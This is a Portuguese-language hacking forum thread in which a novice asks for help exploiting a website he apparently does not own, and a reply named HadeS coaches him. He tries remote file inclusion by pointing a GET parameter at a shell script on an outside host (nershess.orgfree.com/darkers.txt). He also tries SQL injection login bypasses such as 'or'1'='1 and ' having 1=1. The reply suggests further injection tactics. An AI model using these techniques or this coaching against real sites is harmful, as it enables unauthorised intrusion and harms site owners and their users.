Ae galera , sou novo aqui no forum , tava dando uma estuda e naum entendi pq aconteceu isso , alguem pode ma ajudar?
Scaniei um site e indico uma vulnerabilidade "file inclusion", php injection correto? em www.site.com.br/aos_ouvidos.php (http://www.site.com.br/aos_ouvidos.php). La no site tem este link
http://www.site.com/aos_ouvidos.php?target=20060920 (http://www.site.com/aos_ouvidos.php?target=20060920)
entao eu coloco a CMD apos o "="
http://www.site.com/aos_ouvidos.php?tar ... arkers.txt (http://www.site.com/aos_ouvidos.php?target=http://nershess.orgfree.com/darkers.txt)?
no firefox da error ao carregar a pagina e no IE da isso.
Warning: include(colunas/aos_ouvidos/http://nershess.orgfree.com/darkers.txt.php) [function.include]: failed to open stream: No such file or directory in /home/vocenaba/public_html/aos_ouvidos.php on line 38
Warning: include(colunas/aos_ouvidos/http://nershess.orgfree.com/darkers.txt.php) [function.include]: failed to open stream: No such file or directory in /home/vocenaba/public_html/aos_ouvidos.php on line 38
Warning: include() [function.include]: Failed opening 'colunas/aos_ouvidos/http://nershess.orgfree.com/darkers.txt.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/vocenaba/public_html/aos_ouvidos.php on line 38
O q estou fazendo errado ? seria algum problema com a CMD?
o site tbm tem falha de sql injection em:
/sysfoto/images/login.php
tentei colocar no login e na senha 'or'1'='1 mas naum foi. Existem formas melhores de se explorar esta vulnerabilidade?
se alguem puder me ajudar , tanto no PHP injection quanto no SQL agradeço.
vlw
Aqui alguns detalhes:
=== File Inclusion:
This vulnerability affects /aos_ouvidos.php.
Attack details
The GET variable target has been set to http://some-inexistent-website.com/some ... _long_name (http://some-inexistent-website.com/some_inexistent_file_with_long_name).
=== SQL injection :
This vulnerability affects /sysfoto/images/login.php
Attack details
The POST variable login_ has been set to '.
Server banner: Apache 1.3.37
PS: Fiz o scan com o acunetix 4
Você está pedindo a papinha toda feita. Mas pronto desta vez passa...
No primeiro caso de você tivesse investigado teria chegado à mesma conclusão que eu: ou o código php faz algum tipo de verificação a ver se o ficheiro se encontra no server ou então a shell que está a ser utilizada, ou pelo menos uma tentativa de utilizar, não está disponível (ver mais: http://pt.php.net/manual/pt_BR/function.file-exists.php (http://pt.php.net/manual/pt_BR/function.file-exists.php) | http://pt.php.net/manual/pt_BR/function.include.php (http://pt.php.net/manual/pt_BR/function.include.php) ).
Se sabe que a página de login tem falha sql injection é uma questão de explorar, tente procurar sobre o resultado numero 10 por exemplo, porque algumas páginas saltam os primeiros registos para se protegerem contra isso. Caso não dê é preciso uma sql injection mais avançada e que necessitará de estudo seu...
Você tem um File Injection, não um Remote File Injection.
HadeS
Tem razao HadeS, entao eu naum posso usar php injection , ma quanto a SQL injection , teria alguma dica pra em dar? a pagina vulneravel eh http://www.site.com/sysfoto/images/login.php (http://www.site.com/sysfoto/images/login.php) mas logo q eu entro nesta pagina ja aparece um error de SQL
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/vocenaba/public_html/sysfoto/images/login.php on line 5.
e abaixo o campo para colocar o logine a senha:
qualquer coisa q eu tente como 'or'1'='1 ou ' having 1=1 – apenas diz Usuario ou senha invalidos continuando com o mesmo erro citado acima. Poderia me ajudar?
PS: naum estou querendo tudo pronto , imagino como deve ser chato ter q ficar respondendo duvida de newbie mas ja pesquisei bastante e naum consigui nada. vou continuar tentando se eu conseguir vou postar aqui como q eu fiz.
vlw